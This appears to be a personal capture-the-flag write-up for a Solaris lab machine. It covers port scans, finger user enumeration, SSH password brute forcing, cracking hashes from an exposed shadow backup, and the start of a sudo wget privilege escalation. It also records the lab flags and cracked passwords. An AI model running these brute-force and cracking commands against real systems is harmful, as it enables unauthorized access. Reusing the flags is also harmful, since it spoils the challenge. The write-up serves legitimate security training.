Tracker
- User
- root
Loot
Proofs
| File | Flag |
|---|---|
| user.txt | a3d9498027ca5187ba1793943ee8a598 |
| root.txt | fb40fab61d99d37536daeec0d97af9b8 |
Passwords
| Username | Hash | Cleartext | Notes |
|---|---|---|---|
| sunny | sunday | ||
| sammy | cooldude! |
Interesting Artifacts
| Artifact | Original Path | Saved Path | Notes |
|---|---|---|---|
Summary
OS: Solaris
Distribution: ?
Architecture: ?
FQDN: ?
vhosts: ?
Banner
Box info
Maker: Agent22
Solaris machine
Easy rating, 20 points
Lessons Learned
Solution
Open Ports
finger on tcp/79
Sun Solaris fingerd
rpcbind on tcp/111
ssh on tcp/22022
SSH-2.0-Sun_SSH_1.3
rpcbind on tcp/39999
? on tcp/53946
Foothold
Ran quick scan against target.
nmap -vv --reason -Pn -sV -sC --version-all -oN _quick_tcp_nmap.txt 10.10.10.76
# Nmap 7.91 scan initiated Wed Nov 11 10:29:22 2020 as: nmap -vv --reason -Pn -sV -sC --version-all -oN /home/borari/ctf/htb/boxes/10.10.10.76-sunday/scans/_quick_tcp_nmap.txt -oX /home/borari/ctf/htb/boxes/10.10.10.76-sunday/scans/xml/_quick_tcp_nmap.xml 10.10.10.76
Increasing send delay for 10.10.10.76 from 0 to 5 due to 18 out of 59 dropped probes since last increase.
Nmap scan report for 10.10.10.76
Host is up, received user-set (0.048s latency).
Scanned at 2020-11-11 10:29:22 EST for 117s
Not shown: 998 closed ports
Reason: 998 resets
PORT STATE SERVICE REASON VERSION
79/tcp open finger syn-ack ttl 59 Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp open rpcbind syn-ack ttl 63 2-4 (RPC #100000)
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
# Nmap done at Wed Nov 11 10:31:19 2020 -- 1 IP address (1 host up) scanned in 117.04 seconds
Kicked off full TCP port scan in background while I began enumerating quick scan result ports. (This was taking forever, I killed it and kicked of a -T5 nmap scan.)
nmap -vv --reason -Pn -A --osscan-guess --version-all -p -oN _full_tcp_nmap.txt 10.10.10.76
Began Enumerating tcp/111. Enumerated w/ nmap nfs scripts first.
nmap -vv --reason -Pn -sV -p 111 --script="banner,nfs* and not (brute or broadcast or dos or external or fuzzer)" -oN tcp_111_nfs_nmap.txt 10.10.10.76
# Nmap 7.91 scan initiated Wed Nov 11 10:50:50 2020 as: nmap -vv --reason -Pn -sV -p 111 "--script=banner,nfs* and not (brute or broadcast or dos or external or fuzzer)" -oN tcp_111_nfs_nmap.txt 10.10.10.76
Nmap scan report for 10.10.10.76
Host is up, received user-set (0.045s latency).
Scanned at 2020-11-11 10:50:50 EST for 23s
PORT STATE SERVICE REASON VERSION
111/tcp open rpcbind? syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
# Nmap done at Wed Nov 11 10:51:13 2020 -- 1 IP address (1 host up) scanned in 23.69 seconds
Checked for NFS shares.
showmount -e 10.10.10.76 2>&1 | tee tcp_111_showmount.txt
clnt_create: RPC: Authentication error
Checked for RPC info with nmap rpc script scans.
nmap -vv --reason -Pn -sV -p 111 --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN tcp_111_rpc_nmap.txt 10.10.10.76
# Nmap 7.91 scan initiated Wed Nov 11 10:31:19 2020 as: nmap -vv --reason -Pn -sV -p 111 --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN /home/borari/ctf/htb/boxes/10.10.10.76-sunday/scans/tcp_111_rpc_nmap.txt -oX /home/borari/ctf/htb/boxes/10.10.10.76-sunday/scans/xml/tcp_111_rpc_nmap.xml 10.10.10.76
Nmap scan report for 10.10.10.76
Host is up, received user-set (0.043s latency).
Scanned at 2020-11-11 10:31:19 EST for 18s
PORT STATE SERVICE REASON VERSION
111/tcp open rpcbind syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
# Nmap done at Wed Nov 11 10:31:37 2020 -- 1 IP address (1 host up) scanned in 18.15 seconds
Can I connect over rpcclient?
rpcclient -p 111 -U "" 10.10.10.76
Enter WORKGROUP\'s password:
No. Can I connect to the finger service with nc? No.
nc -nv 10.10.10.76 79
(UNKNOWN) [10.10.10.76] 79 (finger) open
No one logged on
Can I find any vulns for finger?
searchsploit finger
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
BSD 4.2 - 'fingerd' Remote Buffer Overflow | bsd/remote/19039.txt
cfingerd 1.4 - Format String (1) | linux/remote/20748.pl
cfingerd 1.4 - Format String (2) | linux/remote/20749.c
cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (1) | unix/local/20962.pl
cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (2) | unix/local/20963.c
cfingerd 1.4.1/1.4.2/1.4.3 Utilities - Local Buffer Overflow (3) | unix/local/20964.c
Daniel Beckham The Finger Server 0.82 Beta - Pipe | cgi/remote/19745.txt
FingerTec Fingerprint Reader - Remote Access and Remote Enrolment | hardware/remote/39227.txt
GNU Ffingerd 1.19 - 'Username' Validity Disclosure | unix/remote/20327.txt
Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure | multiple/remote/39292.pl
Martin Schulze Cfingerd 1.4.2 - GECOS Buffer Overflow | freebsd/local/19504.c
Morris Worm - fingerd Stack Buffer Overflow (Metasploit) | bsd/remote/45791.rb
OpenVms 8.3 Finger Service - Stack Buffer Overflow | multiple/dos/32193.txt
SDFingerD 1.1 - Failure To Drop Privileges Privilege Escalation | linux/local/22806.sh
Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software | windows/local/48815.txt
zkfingerd 0.9.1 - 'say()' Format String | linux/remote/22101.c
zkfingerd SysLog 0.9.1 - Format String | linux/remote/22091.c
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Looks like there might be an exploit-db vuln. 19039.
PoC txt says buffer overflow will allow remote attacker to exec any local binary. This box should have the freebsd nc binary right. This just gives assembly code for PoC.
Google search for Solaris fingerd exploit leads to (https://www.theregister.com/2017/04/11/solaris_shadow_brokers_nsa_exploits/). Article talks about shadow brokers release of nsa exploits, including two solaris 6-10 targeting programs.
EXTREMEPARR (https://twitter.com/hackerfantastic/status/851518138441248772) elevates logged in user, or malicious application/script, to root by abusing code(dtappgather), file permissions, and the setuid binary.
EBBISLAND attacks any open RPC service to spawn a remote root shell on the vulnerable box. This sounds like exactly what I need. Ahhh, this exploits an overflow in Solaris's XDR code, which is exaclty what that edb poc did.
Searchsploit has python PoC for ebbisland.
searchsploit ebbisland
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow | hardware/remote/47888.py
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Copy to my wd.
searchsploit -m 47888
Exploit: EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow
URL: https://www.exploit-db.com/exploits/47888
Path: /usr/share/exploitdb/exploits/hardware/remote/47888.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /home/borari/ctf/htb/boxes/10.10.10.76-sunday/exploit/47888.py
This wasn't working, and I couldn't find any info on the last three args that were required for the exploit.
Researching finger, I realize that I can just run the finger bin from my Kali host, like nslookup, but specify the target host.
finger @10.10.10.76
No one logged on
Ok. There doesn't seem to be any info with the two ports I have available. I go back to check on my full TCP port scan, but saw it was going to take like 4.5 hours to complete. I killed the scan, and started another full TCP port scan, but removed all version/banner detection, and set the timings to -T5.
nmap -vv -p 1-65535 -sS -T5 -oN _aggresive_tcp_nmap.txt 10.10.10.76
This is going much faster, ETA about 15 minutes. Quickly saw that it found tcp/22022. I connected to it with nc to check the banner.
nc -nv 10.10.10.76 22022
(UNKNOWN) [10.10.10.76] 22022 (?) open
SSH-2.0-Sun_SSH_1.3
Sweet, it's an ssh port. I run the nmap ssh script scans against the port.
nmap -vv --reason -Pn -sV -p 22022 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN tcp_22022_ssh_nmap.txt 10.10.10.76
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( [https://nmap.org](https://nmap.org) ) at 2020-11-11 11:33 EST
NSE: Loaded 49 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 11:33
Completed NSE at 11:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 11:33
Completed NSE at 11:33, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:33
Completed Parallel DNS resolution of 1 host. at 11:33, 0.04s elapsed
Initiating SYN Stealth Scan at 11:33
Scanning 10.10.10.76 [1 port]
Discovered open port 22022/tcp on 10.10.10.76
Completed SYN Stealth Scan at 11:33, 0.14s elapsed (1 total ports)
Initiating Service scan at 11:33
Scanning 1 service on 10.10.10.76
Completed Service scan at 11:33, 0.10s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.76.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 11:33
Completed NSE at 11:33, 11.05s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 11:33
Completed NSE at 11:33, 0.00s elapsed
Nmap scan report for 10.10.10.76
Host is up, received user-set (0.11s latency).
Scanned at 2020-11-11 11:33:42 EST for 12s
PORT STATE SERVICE REASON VERSION
22022/tcp open ssh syn-ack ttl 59 SunSSH 1.3 (protocol 2.0)
|_banner: SSH-2.0-Sun_SSH_1.3
| ssh-auth-methods:
| Supported authentication methods:
| gssapi-keyex
| gssapi-with-mic
| publickey
| password
|_ keyboard-interactive
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAKQhj2N5gfwsseuHbx/yCXwOkphQCTzDyXaBw5SHg/vRBW9aYPsWUUV0XGZPlVtbhxFylTZGNZTWJyndzQL3aRcQNouwVH8NnQsT63s4uLKsAP3jx4afAwB7049PvisAxtDVMbqg94vxaJkh88VY/EMpASYNrLFtr1mZngrbAzOvAAAAFQCiLK6Oh21fvEjgZ0Yl0IRtONW/wwAAAIAxz1u+bPH+VE7upID2HEvYksXOItmohsDFt0oHmGMHf9TKwZvqQLZRix0eXYu8zLnTIdg7rVYSjGyRhuWeIkl1+0aIJL4/dzB+JthInTGFIngc83MtonLP4Sj3YL20wL9etVh8/M0ZOedntWrQcUW+8cUWZRlgW8q620HZKE8VqAAAAIB0s8wn1ufviVEKXct60uz2ZoduUgg07dfPfzvhpbw232KYUJ6lchTj2p2AV8cD0fk2lok2Qc6Kn/OKSjO9C0PlvG8WWkVVvlISUY4BEhtqtL3aof7PYp5nCrLK+2v+grCLxOvyYpT1OfDMQbahOWGZ9OCwQtQXKP1wYEQMqMsSRg==
| 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxAwq7HNZXHr7XEeYeKsbnaruPQyUK5IkSE/FxHesBaKQ37AsLjw8iacqUvcs8IuhPfiTtwuwU42zUHu1e1rmLpRlMyLQnjgJH1++fP5E0Qnxj4DrFr7aeRv1FqPkrnK/xCX46AdgUhs4+4YA04yfi8pOlaSEVucYaqWNhuqJkt8=
| ssh2-enum-algos:
| kex_algorithms: (3)
| gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==
| diffie-hellman-group-exchange-sha1
| diffie-hellman-group1-sha1
| server_host_key_algorithms: (2)
| ssh-rsa
| ssh-dss
| encryption_algorithms: (6)
| aes128-ctr
| aes192-ctr
| aes256-ctr
| arcfour128
| arcfour256
| arcfour
| mac_algorithms: (4)
| hmac-md5
| hmac-sha1
| hmac-sha1-96
| hmac-md5-96
| compression_algorithms: (2)
| none
|_ zlib
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 11:33
Completed NSE at 11:33, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 11:33
Completed NSE at 11:33, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 12.04 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
Ok, looks like password authentication is supported, along with pubkey, keyboard interactive, and some gssapi methods I'm not familiar with. I feel like I remember abusing somehting that allowed keyboard-interactive auth before but I cant remember rn.
Whats on tcp/45484? Idk, no banners or anything.
nc -nv 10.10.10.76 45484
(UNKNOWN) \[10.10.10.76\] 45484 (?) open
Whats on 62331? Idk.
root@kali# nc -nv 10.10.10.76 62331
(UNKNOWN) \[10.10.10.76\] 62331 (?) open
I should do a full nmap port scan, but only target the ports that were discovered open during the -T5 scan.
nmap -vv --reason -Pn -A --osscan-guess --version-all -p 79,111,22022,45484 -oN _known_tcp_nmap.txt 10.10.10.76
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( [https://nmap.org](https://nmap.org) ) at 2020-11-11 11:41 EST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:41
Completed NSE at 11:41, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:41
Completed NSE at 11:41, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:41
Completed NSE at 11:41, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:41
Completed Parallel DNS resolution of 1 host. at 11:41, 0.04s elapsed
Initiating SYN Stealth Scan at 11:41
Scanning 10.10.10.76 [4 ports]
Discovered open port 111/tcp on 10.10.10.76
Discovered open port 45484/tcp on 10.10.10.76
Discovered open port 79/tcp on 10.10.10.76
Discovered open port 22022/tcp on 10.10.10.76
Completed SYN Stealth Scan at 11:41, 0.08s elapsed (4 total ports)
Initiating Service scan at 11:41
Scanning 4 services on 10.10.10.76
Completed Service scan at 11:42, 26.45s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.76
Retrying OS detection (try #2) against 10.10.10.76
Initiating Traceroute at 11:42
Completed Traceroute at 11:42, 0.06s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:42
Completed Parallel DNS resolution of 2 hosts. at 11:42, 0.04s elapsed
NSE: Script scanning 10.10.10.76.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:42
Completed NSE at 11:42, 10.11s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:42
Completed NSE at 11:42, 1.11s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:42
Completed NSE at 11:42, 0.00s elapsed
Nmap scan report for 10.10.10.76
Host is up, received user-set (0.046s latency).
Scanned at 2020-11-11 11:41:41 EST for 42s
PORT STATE SERVICE REASON VERSION
79/tcp open finger syn-ack ttl 59 Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp open rpcbind syn-ack ttl 63
22022/tcp open ssh syn-ack ttl 59 SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAKQhj2N5gfwsseuHbx/yCXwOkphQCTzDyXaBw5SHg/vRBW9aYPsWUUV0XGZPlVtbhxFylTZGNZTWJyndzQL3aRcQNouwVH8NnQsT63s4uLKsAP3jx4afAwB7049PvisAxtDVMbqg94vxaJkh88VY/EMpASYNrLFtr1mZngrbAzOvAAAAFQCiLK6Oh21fvEjgZ0Yl0IRtONW/wwAAAIAxz1u+bPH+VE7upID2HEvYksXOItmohsDFt0oHmGMHf9TKwZvqQLZRix0eXYu8zLnTIdg7rVYSjGyRhuWeIkl1+0aIJL4/dzB+JthInTGFIngc83MtonLP4Sj3YL20wL9etVh8/M0ZOedntWrQcUW+8cUWZRlgW8q620HZKE8VqAAAAIB0s8wn1ufviVEKXct60uz2ZoduUgg07dfPfzvhpbw232KYUJ6lchTj2p2AV8cD0fk2lok2Qc6Kn/OKSjO9C0PlvG8WWkVVvlISUY4BEhtqtL3aof7PYp5nCrLK+2v+grCLxOvyYpT1OfDMQbahOWGZ9OCwQtQXKP1wYEQMqMsSRg==
| 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxAwq7HNZXHr7XEeYeKsbnaruPQyUK5IkSE/FxHesBaKQ37AsLjw8iacqUvcs8IuhPfiTtwuwU42zUHu1e1rmLpRlMyLQnjgJH1++fP5E0Qnxj4DrFr7aeRv1FqPkrnK/xCX46AdgUhs4+4YA04yfi8pOlaSEVucYaqWNhuqJkt8=
45484/tcp open rpcbind syn-ack ttl 63
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Sun Solaris 10 (94%), Sun OpenSolaris 2008.11 (93%), Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b (93%), Sun Solaris 9 or 10 (SPARC) (91%), Sun Solaris 9 or 10 (91%), Sun Storage 7210 NAS device (90%), Oracle Solaris 11 (90%), Sun Solaris 8 (SPARC) (90%), Sun Solaris 9 (89%), Sun Solaris 7 (SPARC) (88%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.91%E=4%D=11/11%OT=79%CT=%CU=41503%PV=Y%DS=2%DC=T%G=N%TM=5FAC146F%P=x86_64-pc-linux-gnu)
SEQ(SP=92%GCD=1%ISR=A4%TI=I%II=I%SS=S%TS=7)
SEQ(CI=I)
OPS(O1=NNT11M54DNW0NNS%O2=NNT11M54DNW0NNS%O3=NNT11M54DNW0%O4=NNT11M54DNW0NNS%O5=NNT11M54DNW0NNS%O6=NNT11M54DNNS)
WIN(W1=C265%W2=C265%W3=C1CC%W4=C068%W5=C068%W6=C0B7)
ECN(R=Y%DF=Y%T=3C%W=C421%O=M54DNW0NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=Y%DF=Y%T=FF%IPL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=Y%T=FF%CD=S)
Network Distance: 2 hops
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 53.27 ms 10.10.14.1
2 50.91 ms 10.10.10.76
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:42
Completed NSE at 11:42, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:42
Completed NSE at 11:42, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:42
Completed NSE at 11:42, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/) .
Nmap done: 1 IP address (1 host up) scanned in 43.32 seconds
Raw packets sent: 82 (6.074KB) | Rcvd: 42 (2.744KB)
Nothing new. Can I rpcclient to 45484? Nope.
rpcclient -p 45484 -U "" 10.10.10.76
Enter WORKGROUP\'s password:
Did I crash something when I attempted that Shadow Brokers exploit? I should reset the box. I reset the box, then re-ran the -T5 nmap full TCP port scan.
nmap -vv -p 1-65535 -sS -T5 -oN _aggresive-2_tcp_nmap.txt 10.10.10.76
Yeah, theres something on 53946 that wasn't there before. Ok, it looks like the port on 53946 is static, but the rpcbind port seems to be changing on each reboot or whatever, which makes sense.
While I was wating on the nmap scan to finish, I looked up more information on finger enumeration, and I discovered a pentestmonkey finger-user-enum Perl script. (https://raw.githubusercontent.com/pentestmonkey/finger-user-enum/master/finger-user-enum.pl). Downloaded and ran it. It requires us feeding it a user list to check, like the SMTP VRFY enumeration. I piped it to less -S in order to fix the horrible line wrapping situation going on in the script output. The only output lines that make any sense are those for user root, user sammy and user sunny, so I add those to a users.txt file.
One thing that was interesting about this was that both user sunny and user root were logged in from the same tty, pts/3.
perl ~/tools/host/prod-scripts/finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76 | less -S
Starting finger-user-enum v1.0 ( [http://pentestmonkey.net/tools/finger-user-enum](http://pentestmonkey.net/tools/finger-user-enum) )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10164
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Wed Nov 11 12:12:52 2020 #########
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line P>
anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.10.10.76: bin ??? < . . . . >..
dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???..
jo ann@10.10.10.76: Login Name TTY Idle When Where..jo ???..ann ???..
la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???..
line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@10.10.10.76: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
root@10.10.10.76: root Super-User pts/3 <Apr 24, 2018> sunday ..
sammy@10.10.10.76: sammy console <Jul 31 17:59>..
sunny@10.10.10.76: sunny pts/3 <Apr 24, 2018> 10.10.14.4 ..
sys@10.10.10.76: sys ??? < . . . . >..
zsa zsa@10.10.10.76: Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Wed Nov 11 12:49:26 2020 #########
14 results.
10164 queries in 2194 seconds (4.6 queries / sec)
Fuck, that took 37m 20s lol.
Alright, since I have some usernames, I decided to try to brute force the login. I can't use hydra like I normally would because the server uses very old key exchange methods. I can tell this because if I try to open an SSH session as any user, I get a key error.
ssh -p 22022 10.10.10.76
Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
Instead, I can use patator.
patator ssh_login host=10.10.10.76 port=22022 user=FILE0 0=users.txt password=FILE1 1=/usr/share/wordlists/rockyou.txt
Ok, that output was filled with all the failed logins as well. I reran the command with -x to ignore Auth Failed messages in output.
patator ssh_login host=10.10.10.76 port=22022 user=FILE0 0=users.txt password=FILE1 1=/usr/share/wordlists/rockyou.txt -x ignore:mesg='Authentication failed.'
I got a password hit back! I ssh in to the target machine in order to attempt these credentials.
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -p 22022 sunny@10.10.10.76
The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' can't be established.
RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.76]:22022' (RSA) to the list of known hosts.
Password:
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$
That works, but I don't have the user flag. I change to the root directory and look at the directories. There is a /backup directory that I have read/execute privs to. Backup dirs usually arent in root like this, lets look at it.
sunny@sunday:~$ cd /
sunny@sunday:/$ ls -lAh
total 524K
drwxr-xr-x 2 root root 4 2018-04-15 20:44 backup
lrwxrwxrwx 1 root root 9 2018-04-15 19:52 bin -> ./usr/bin
drwxr-xr-x 6 root sys 7 2018-04-15 19:52 boot
drwxr-xr-x 2 root root 2 2018-04-16 15:33 cdrom
drwxr-xr-x 87 root sys 265 2020-11-11 22:24 dev
drwxr-xr-x 4 root sys 10 2020-11-11 22:24 devices
drwxr-xr-x 78 root sys 225 2020-11-11 22:25 etc
drwxr-xr-x 3 root root 3 2018-04-15 19:44 export
dr-xr-xr-x 1 root root 1 2020-11-11 22:25 home
drwxr-xr-x 19 root sys 20 2018-04-15 19:45 kernel
drwxr-xr-x 10 root bin 180 2018-04-15 19:45 lib
drwx------ 2 root root 2 2009-05-14 21:27 lost+found
drwxr-xr-x 2 root root 4 2020-11-11 22:25 media
drwxr-xr-x 2 root sys 2 2018-04-15 19:52 mnt
dr-xr-xr-x 1 root root 1 2020-11-11 22:25 net
drwxr-xr-x 4 root sys 4 2018-04-15 19:52 opt
drwxr-xr-x 5 root sys 5 2009-05-14 21:21 platform
dr-xr-xr-x 112 root root 469K 2020-11-11 23:47 proc
drwx------ 6 root root 13 2018-04-24 10:31 root
drwxr-xr-x 4 root root 4 2018-04-15 19:52 rpool
drwxr-xr-x 2 root sys 58 2018-04-15 19:53 sbin
drwxr-xr-x 4 root root 4 2009-05-14 21:18 system
drwxrwxrwt 5 root sys 457 2020-11-11 23:37 tmp
drwxr-xr-x 30 root sys 44 2018-04-15 19:46 usr
drwxr-xr-x 35 root sys 35 2018-04-15 20:26 var
It looks like I have a shadow file backup here...
sunny@sunday:/$ cd backup
sunny@sunday:/backup$ ls -lAh
total 2.0K
-r-x--x--x 1 root root 53 2018-04-24 10:35 agent22.backup
-rw-r--r-- 1 root root 319 2018-04-15 20:44 shadow.backup
I cat out the file and get user sammy and user sunny's password hashes.
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
Since these are Unix sha256 hashes, I throw them in a hash file and throw that at hashcat.
hashcat -m7400 -a 0 --username --session sunday shadow.hashes /usr/share/wordlists/rockyou.txt -O
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz, 5851/5915 MB (2048 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 55
Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Optimized-Kernel
* Zero-Byte
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 65 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344387
* Bytes.....: 139921525
* Keyspace..: 14344387
$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:sunday
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!
Session..........: sunday
Status...........: Cracked
Hash.Name........: sha256crypt $5$, SHA256 (Unix)
Hash.Target......: shadow.hashes
Time.Started.....: Wed Nov 11 13:18:54 2020 (14 mins, 29 secs)
Time.Estimated...: Wed Nov 11 13:33:23 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 219 H/s (18.53ms) @ Accel:8 Loops:1024 Thr:1 Vec:8
Recovered........: 2/2 (100.00%) Digests, 2/2 (100.00%) Salts
Progress.........: 407104/28688774 (1.42%)
Rejected.........: 0/407104 (0.00%)
Restore.Point....: 203520/14344387 (1.42%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:4096-5000
Candidates.#1....: coolpeople -> contrase
Started: Wed Nov 11 13:18:19 2020
Stopped: Wed Nov 11 13:33:25 2020
And we get a positive hit back, sammy's password is cooldude! I then su - into sammy.
sunny@sunday:/backup$ su - sammy
Password:
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sammy@sunday:~$
User Compromise
EoP Enumeration
I began privesc enum by checking to see if sammy had sudo privs to anythign either.
sammy@sunday:\~\$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
Wget? I think this might be easy root, I need to check gtfobins.(https://gtfobins.github.io/gtfobins/wget/#sudo). Doesn't look like theres a way to get a shell straight up. wget -h shows the -i flag should allow me to include a file with URLs to download from. Since I'm running as sudo, I should be able to read in the /root/troll file.
